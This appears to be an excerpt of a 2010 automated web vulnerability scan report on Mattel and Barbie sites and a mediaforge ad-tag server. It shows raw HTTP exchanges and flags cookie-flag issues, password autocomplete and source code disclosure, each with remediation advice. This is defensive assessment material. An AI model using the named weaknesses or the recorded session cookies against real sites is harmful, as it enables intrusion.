HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:24 GMT Server: Apache X-Powered-By: PHP/4.4.4-8+etch6 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Mon, 26 Jul 1997 05:00:00 GMT Set-Cookie: cluid=4039987430558971793; expires=Mon, 23 Dec 2030 00:14:24 GMT; path=/ P3P: CP='NOI DSP COR CUR OUR NID NOR' Vary: Accept-Encoding Connection: close Content-Type: text/javascript Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /if/146 HTTP/1.1 Host: tags.mediaforge.com Proxy-Connection: keep-alive Referer: http://shop.mattel.com/shop/index.jsp?categoryId=10811496&sr=1&origkw=video Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pID=|146,4199678; uID=CsF6Mk0Sky7AdwIeH6r8Ag==
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Type: text/plain Content-Type: text/html Date: Thu, 23 Dec 2010 00:14:27 GMT P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT" PRAGMA: no-cache Server: nginx/0.7.65 Set-Cookie: pID=|146,4199678; expires=Sat, 22-Dec-2012 00:00:00 GMT; domain=.mediaforge.com; path=/ Content-Length: 1367 Connection: keep-alive
<html lang="en-US"><head> <meta charset="UTF-8"> <title></title></head><body> <div id="mf_div"></div> <script type="text/javascript"> var _mf_tag = { "init": function() { var id = 'mf_div'; ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /if/146/?prodID=4199678 HTTP/1.1 Host: tags.mediaforge.com Proxy-Connection: keep-alive Referer: http://shop.mattel.com/product/index.jsp?productId=4199678 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Type: text/plain Content-Type: text/html Date: Thu, 23 Dec 2010 00:09:18 GMT P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT" P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT" PRAGMA: no-cache Server: nginx/0.7.65 Set-Cookie: pID=|146,4199678; expires=Sat, 22-Dec-2012 00:00:00 GMT; domain=.mediaforge.com; path=/ Set-Cookie: uID=CsF6Mk0Sky7AdwIeH6r6Ag==; expires=Fri, 23-Dec-11 00:09:18 GMT; domain=.mediaforge.com; path=/ Content-Length: 1367 Connection: keep-alive
<html lang="en-US"><head> <meta charset="UTF-8"> <title></title></head><body> <div id="mf_div"></div> <script type="text/javascript"> var _mf_tag = { "init": function() { var id = 'mf_div'; ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /videogirl/ HTTP/1.1 Host: www.barbie.com Proxy-Connection: keep-alive Referer: http://videogirlcontest.barbie.com/public/media/BarbieGalleryVote_safe.swf Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=wdgjdh55j4yeggemedanpan4; logcookie=2c7468ff-e3a8-450d-8fcc-30c2ae15b5a0; CanadaRedirect=yes; gn_country=US; flashDetected=true; __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:01:01 GMT Server: MII-WSD/1.4 Cache-Control: private Pragma: no-cache Expires: Thu, 23 Dec 2010 00:00:01 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: NSC_Cbscjf_Xfcgbsn=440af0aa3660;expires=Thu, 23-Dec-10 00:03:28 GMT;path=/ Via: HTTP/1.1 www.barbie.com (MII-WSD/1.4) x-Message1: Powered by Mirror Image Internet (NC) Content-Type: text/html; charset=utf-8 Content-Length: 25831 Via: 1.1 bfi107106 (MII-APC/1.6)
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:10:44 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache Pragma: no-cache P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 56514
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--Preview TimeZone = 'null' --><!--Preview Time ...[SNIP]... <tr>
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:10:44 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache Pragma: no-cache P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 56514
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.